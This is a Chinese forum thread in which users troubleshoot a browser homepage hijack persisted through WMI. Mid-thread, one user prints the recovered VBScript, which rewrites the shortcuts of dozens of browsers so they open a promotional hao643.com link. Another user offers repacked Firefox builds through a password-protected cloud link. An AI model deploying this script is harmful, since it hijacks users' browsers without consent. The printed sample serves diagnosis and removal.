浏览器被劫持网址

chishingchan

如何感染此恶意脚本的有没有印象？！
一般需要太复杂的方式处理的话，在允许的情况下建议重装系统来的快。

窄口牛

右下角常驻进程，服务里异常服务，或者计划任务定时操作；因为是动态修改，肯定不是启动项那么简单，启动项只是启动了后台驻留操作。

szwp

edge有此现像么？

chenfine

能换系统就换吧，不过也没有什么可担心的，只是那些推广员，推广主页链接

    前几年出现的，是一个通过WMI发起的定时自动运行脚本。利用VBScript调用系统服务将所有浏览器加上尾巴！没有进程，没有文件！

    我在一个博客上看过！下载安装WMITool，查看WMI事件！找到感染的代码干掉，再清理浏览器快捷方式尾巴能解决！也许情况会不同，关键是那个代码脚本！很多人称它 病毒脚本！

只能说，现在的推广员真真高手！

2012andyle113

这手段有点高明了，这些都没有的话，那就只有服务，计划任务了
其实对付这种玩意，360是老祖宗了有效的很

JERRY爱电脑

1.可以用注册表搜索那个网址，看看有没有
2.用安全软件锁定

sd3166

因为一个主页。要重装系统。也有点。。。但有些顽固的是不好清。在试试吧

zpwz

36有时还是有用的

窄口牛

那就可能是注入正常的系统进程了，那就得杀毒扫描了。

chenfine

DOSforever 发表于 2021-8-24 11:44
是的，我就是按照你说的方法查到的，可问题是即便通过 WMI Tools 删掉了定时在快捷方式上加尾巴的恶意 sc ...

有个地址是存储在WMI数据库中，删除了吗，

nianyueriPE

去火绒论坛求助一下。

tools241

本人特制的Fx91.0esr(64)与Fx(64) v92.0b7 -- 增加封锁 *hao6*.com

本人特制了多版Firefox 免安装 异空版 (已添加>20个元件, 简/繁/英 通用).
Fx91.0esr(64)(64位版元含profile及元件).7z  94.7M  v91.0esr 2021/08/09  -- 已封锁 *hao6*.com
Fx(64)(本版64位元含profile及元件).7z          94.8M  v92.0b7 2021/08/24   -- 已封锁 *hao6*.com

Fx56(免安装异空版,不支援XP,可用新旧套件不可用外挂,32位元含26元件,简繁英通用).rar
Fx17(适1G以下记忆体,简繁英通用).rar
Fx3.6.28(适768M以下记忆体,简繁通用).rar
** 上列各版早已封锁*hao1*.com, *hao5*.com, ...

Firefox -- 链接: https://pan.baidu.com/s/1hx1-WAbC10vi6rdoQySvfA 提取码: pcgk , 解压密码:tools241

szwp

DOSforever 发表于 2021-8-24 11:40
没有，只影响以下浏览器：

在它的列表中我只有 IE 和 Firefox 。

iexplorer.exe 和 firefox.exe  改名有效么？

similarr

一直被劫持困扰               

haonan521

DOSforever 发表于 2021-8-24 11:40
没有，只影响以下浏览器：

在它的列表中我只有 IE 和 Firefox 。

他是怎么实现锁这些浏览器主页的，可以把原理和工具说一下吗

chishingchan

楼主不妨将恶意脚本的程序上传，我当一回李时珍又如何？！

chishingchan

DOSforever 发表于 2021-8-24 16:17
你看下这是不是：

这是 VBScript 脚本，整理一下：

1. On Error Resume Next
   
2. 
   
3. Const link = "http://hao643.com/?r=ggggg&m=e18"
   
4. Const link360 = "http://hao643.com/?r=ggggg&m=e18&s=3"
   
5. 
   
6. browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
   
7. 
   
8. lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
   
9. 
   
10. browsersArr = split(browsers,",")
    
11. 
    
12. Set oDic = CreateObject("scripting.dictionary")
    
13. 
    
14. For Each browser In browsersArr
    
15.         oDic.Add LCase(browser), browser
    
16. Next
    
17. 
    
18. lnkpathsArr = split(lnkpaths,",")
    
19. 
    
20. Set oFolders = CreateObject("scripting.dictionary")
    
21. 
    
22. For Each lnkpath In lnkpathsArr
    
23.         oFolders.Add lnkpath, lnkpath
    
24. Next
    
25. 
    
26. Set fso = CreateObject("Scripting.Filesystemobject")
    
27. 
    
28. Set WshShell = CreateObject("Wscript.Shell")
    
29. 
    
30. For Each oFolder In oFolders
    
31.         If fso.FolderExists(oFolder) Then
    
32.                 For Each file In fso.GetFolder(oFolder).Files
    
33.                         If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
    
34.                                 Set oShellLink = WshShell.CreateShortcut(file.Path)
    
35.                                 path = oShellLink.TargetPath
    
36.                                 name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
    
37.                                 If oDic.Exists(LCase(name)) Then
    
38.                                         If LCase(name) = LCase("360se.exe") Then
    
39.                                                 oShellLink.Arguments = link360
    
40.                                         Else
    
41.                                                 oShellLink.Arguments = link
    
42.                                         End If
    
43.                                         If file.Attributes And 1 Then
    
44.                                                 file.Attributes = file.Attributes - 1
    
45.                                         End If
    
46.                                         oShellLink.Save
    
47.                                 End If
    
48.                         End If
    
49.                 Next
    
50.         End If
    
51. Next

复制代码

JERRY爱电脑

DOSforever 发表于 2021-8-24 11:47
搜过，没有。某些安全软件更不安全。

浏览器目录新建一个bat，用start命令打开浏览器，快捷方式指向bat就可以